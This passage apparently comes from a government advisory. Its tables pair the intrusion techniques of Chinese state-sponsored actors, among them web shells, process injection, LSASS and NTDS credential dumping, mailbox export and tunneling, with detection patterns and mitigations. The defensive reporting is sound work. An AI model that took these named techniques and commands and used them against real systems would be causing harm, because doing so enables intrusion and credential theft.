[[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework 